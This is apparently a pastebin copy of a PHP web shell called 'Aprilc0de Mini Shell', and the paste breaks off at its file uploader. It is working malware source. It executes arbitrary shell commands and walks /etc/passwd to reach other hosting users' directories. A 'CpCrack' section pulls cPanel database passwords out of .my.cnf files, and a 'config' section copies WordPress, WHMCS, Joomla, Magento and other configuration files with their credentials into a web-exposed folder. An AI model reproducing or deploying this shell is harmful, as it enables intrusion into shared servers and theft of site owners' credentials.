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a guest
Sep 25th, 2018
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  1. <?php
  2. error_reporting(0);
  3. ?>
  4. <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
  5. ""><html xmlns="">
  6. <title>Aprilc0de Mini Shell</title>
  7. <link href="" rel="stylesheet" type="text/css">
  8. <style>
  9. body {background:#fff;color:#F7C630;padding-left:5px;padding-right:5px;font-family:Squada One;}
  10. a {text-decoration:none;color:#2F706C;}
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  13. input[type=submit] {background:none;font-family:Squada One;color:#AE8FBA;border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
  14. .t {color:#AE8FBA}
  15. input[type=file], input[type=text], input[type=password] {background:#fff;font-family:Squada One;color:#036564;border:1px solid #2D1F3B;margin:3px;padding:2px;height:21px;width:300px;}
  16. </style>
  18. <?php
  19. // Coded By UstadCage_48 - Aprilc0de
  20. // 100% ?? tentu tidak lah bro
  21. // Default pas [x48]
  22. // fb853cd86dc5cccd63690f6b93ccd15e
  23. $pass="";
  24. session_start();
  25. error_reporting(0);
  26. function ustad(){
  27. echo '<center>&#8226; Aprilc0de Mini Shell &#8226;<br><form action="" method="post">
  28. <input type="password" style="width:250px" name="pass" value="" /> <input type="submit" value=" >> " name="submitlogin" />
  29. </form></center>';
  30. exit;
  31. }
  33. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  34. if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  35. else
  36. ustad();
  37. if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); }
  39. if($_GET['path']){
  40. $path = $_GET['path'];
  41. } else {
  42. $path = getcwd();
  43. }
  44. error_reporting(0);
  45. $dir = str_replace('\\','/',$path);
  46. $paths = explode('/',$dir);
  47. $uname = php_uname();
  48. $os = PHP_OS;
  49. $ip = $_SERVER['SERVER_ADDR'];
  50. $id = getmyuid().'/'.getmygid();
  51. $soft = $_SERVER['SERVER_SOFTWARE'];
  52. $ver = phpversion();
  53. if(ini_get('safe_mode')==0){ $sm = "<font color='#EA5A6A'>OFF</font>"; } else { $sm = "ON"; }
  54. if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "<font color='#EA5A6A'>OFF</font>"; } else { $mq = "ON"; }
  56. function exe($cmd){
  57. if(function_exists('system')) {
  58. @ob_start();
  59. @system($cmd);
  60. $buff = @ob_get_contents();
  61. @ob_end_clean();
  62. return $buff;
  63. }
  64. elseif(function_exists('exec')) {
  65. @exec($cmd,$results);
  66. $buff = "";
  67. foreach($results as $result){
  68. $buff .= $result;
  69. }
  70. return $buff;
  71. }
  72. elseif(function_exists('passthru')) {
  73. @ob_start();
  74. @passthru($cmd);
  75. $buff = @ob_get_contents();
  76. @ob_end_clean();
  77. return $buff;
  78. }
  79. elseif(function_exists('shell_exec')){
  80. $buff = @shell_exec($cmd);
  81. return $buff;
  82. }
  83. }
  85. if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "<font color='#EA5A6A'>OFF</font>"; }
  86. if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "<font color='#EA5A6A'>OFF</font>"; }
  87. if(exe('wget --help')) { $wget = "ON"; } else { $wget = "<font color='#EA5A6A'>OFF</font>"; }
  88. if(exe('perl -h')) { $perl = "ON"; } else { $perl = "<font color='#EA5A6A'>OFF</font>"; }
  89. if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "<font color='#EA5A6A'>OFF</font>"; }
  91. echo "<br>&#8362; Aprilc0de Mini Shell<br>&#8362; <font color='#629454'>UNAME :</font> $uname <br>";
  92. echo "&#8362; <font color='#629454'>IP :</font> $ip $soft $os $ver ( $id )<br>";
  93. echo "&#8362; <font color='#629454'>SAFEMOD :</font> $sm &#8227; <font color='#629454'>MAGIC :</font> $mq &#8227; <font color='#629454'>MYSQL :</font> $mysql &#8227; <font color='#629454'>DISFUNC :</font> $df &#8227; <font color='#629454'>CURL :</font> $curl &#8227; <font color='#629454'>WGET :</font> $wget<br>";
  95. echo "&#8362; <font color='#629454'>PATH :</font> ";
  96. foreach($paths as $id=>$pat){
  97. if($pat == '' && $id == 0){
  98. $a = true;
  99. echo '<a style="color:#F7C630;" href="?path=/"> &#8227; </a>';
  100. continue;
  101. }
  102. if($pat == '') continue;
  103. echo '<a class="t" href="?path=';
  104. for($i=0;$i<=$id;$i++){
  105. echo "$paths[$i]";
  106. if($i != $id) echo "/";
  107. }
  108. echo '">'.$pat.'</a> &#8227; ';
  109. }
  110. echo "<br><br><center><a class='aa' href='?upload&path=$path'>Upload</a> <a class='aa' href='?jumping&path=$path'>Jumper</a> <a class='aa' href='?config'>Config</a> <a class='aa' href='?cpcrack'>CpCrack</a></center><br>";
  112. if(isset($_GET['cpcrack'])){
  114. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  115. $ar0=explode($marqueurDebutLien, $text);
  116. $ar1=explode($marqueurFinLien, $ar0[$i]);
  117. return trim($ar1[0]);
  118. }
  120. echo '<br><br>';
  122. echo "<center>";
  123. $d0mains = @file('/etc/named.conf');
  124. $domains = scandir("/var/named");
  126. if ($domains or $d0mains)
  127. {
  128. $domains = scandir("/var/named");
  129. if($domains) {
  130. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  131. $count=1;
  132. $dc = 0;
  133. $list = scandir("/var/named");
  134. foreach($list as $domain){
  135. if(strpos($domain,".db")){
  136. $domain = str_replace('.db','',$domain);
  137. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  138. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  139. $path = getcwd();
  141. if (is_readable($dirz)) {
  142. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  143. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  144. $password=entre2v2($p,'password="','"');
  145. echo "<tr><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'> >> </a></td></tr>";
  146. $dc++;
  147. }
  148. }
  149. }
  150. echo '</table>';
  151. $total = $dc;
  152. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  153. echo '</center>';
  154. }else{
  155. $d0mains = @file('/etc/named.conf');
  156. if($d0mains) {
  157. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  158. $count=1;
  159. $dc = 0;
  160. $mck = array();
  161. foreach($d0mains as $d0main){
  162. if(@eregi('zone',$d0main)){
  163. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  164. flush();
  165. if(strlen(trim($domain[1][0])) >2){
  166. $mck[] = $domain[1][0];
  167. }
  168. }
  169. }
  170. $mck = array_unique($mck);
  171. $usr = array();
  172. $dmn = array();
  173. foreach($mck as $o) {
  174. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  175. $usr[] = $infos['name'];
  176. $dmn[] = $o;
  177. }
  178. array_multisort($usr,$dmn);
  179. $dt = file('/etc/passwd');
  180. $passwd = array();
  181. foreach($dt as $d) {
  182. $r = explode(':',$d);
  183. if(strpos($r[5],'home')) {
  184. $passwd[$r[0]] = $r[5];
  185. }
  186. }
  187. $l=0;
  188. $j=1;
  189. foreach($usr as $r) {
  190. $dirz = '/home/'.$r.'/.my.cnf';
  191. $path = getcwd();
  192. if (is_readable($dirz)) {
  193. copy($dirz, ''.$path.'/'.$r.'.txt');
  194. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  195. $password=entre2v2($p,'password="','"');
  196. echo "<tr><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'> >> </a></td></tr>";
  197. $dc++;
  198. flush();
  199. $l=$l?0:1;
  200. $j++;
  201. }
  202. }
  203. }
  204. echo '</table>';
  205. $total = $dc;
  206. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  207. echo '</center>';
  209. }
  210. }else{
  211. echo "</center><font color='#629454'>ERROR : </font>/var/named or etc/named.conf Not Accessible!";
  212. }
  213. exit;
  215. }
  217. if(isset($_GET['view'])){
  218. echo "<center><textarea>".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."</textarea></center>";
  219. exit;
  220. }
  221. if(isset($_GET['jumping'])){
  222. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><font color="#AE8FBA">Error: safe_mode = on</font>');
  223. set_time_limit(0);
  224. @$passwd = fopen('/etc/passwd','r');
  225. if (!$passwd) { die('<br><font color="#AE8FBA">Error : coudn`t read /etc/passwd</font>'); }
  226. $pub = array();
  227. $users = array();
  228. $conf = array();
  229. $i = 0;
  230. while(!feof($passwd))
  231. {
  232. $str = fgets($passwd);
  233. if($i>35){
  234. $pos = strpos($str,':');
  235. $username = substr($str,0,$pos);
  236. $dirz = '/home/'.$username.'/public_html/';
  237. if(($username != '')){
  238. if(is_readable($dirz)){
  239. array_push($users,$username);
  240. array_push($pub,$dirz);
  241. }}}
  242. $i++;
  243. }
  244. echo "<br>&#8227; <font color='#629454'>Total :</font> ".sizeof($users)."/".sizeof($pub)." User";
  245. echo "<br><br>";
  246. foreach($users as $user){
  247. $path = "/home/$user/public_html/";
  248. echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
  249. echo "&#8226; <a href='?path=$path'>$path</a><br>";
  250. echo " </td></tr></table> ";
  251. }
  252. exit;
  253. }
  254. // config by Indoxploit
  255. if(isset($_GET['config']))
  256. {
  257. $etc = fopen("/etc/passwd", "r");
  258. $idx = mkdir("aprilc0de", 0777);
  259. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  260. $htc = fopen("aprilc0de/.htaccess","w");
  261. fwrite($htc, $isi_htc);
  262. while($passwd = fgets($etc)) {
  263. if($passwd == "" || !$etc) {
  264. echo "<font color=#AE8FBA>Can't read /etc/passwd</font>";
  265. } else {
  266. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  267. foreach($user_config[1] as $user_idx){
  268. $user_config_dir = "/home/$user_idx/public_html/";
  269. if(is_readable($user_config_dir)) {
  270. $grab_config = array(
  271. "/home/$user_idx/.my.cnf" => "cpanel",
  272. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  273. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  274. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  275. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  276. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  277. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  278. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  279. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  280. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  281. "/home/$user_idx/public_html/config/" => "PrestaShop",
  282. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  283. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  284. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  285. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  286. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  287. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  288. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  289. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  290. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  291. foreach($grab_config as $config => $nama_config){
  292. $ambil_config = file_get_contents($config);
  293. if($ambil_config == ''){
  294. } else {
  295. $file_config = fopen("aprilc0de/$user_idx-$nama_config.txt","w");
  296. fputs($file_config,$ambil_config);
  297. }}} }}}
  298. $path = getcwd();
  299. echo "&#8227;<font color='629454'> Done :</font> <a href='?beby=exploler&path=$path$dir/aprilc0de'>Click Here</a>";
  300. exit;
  301. }
  302. // uploader
  303. if(isset($_GET['upload'])){
  304. $path = $_GET['path'];
  305. echo '<center><form action="" method="post" enctype="multipart/form-data">
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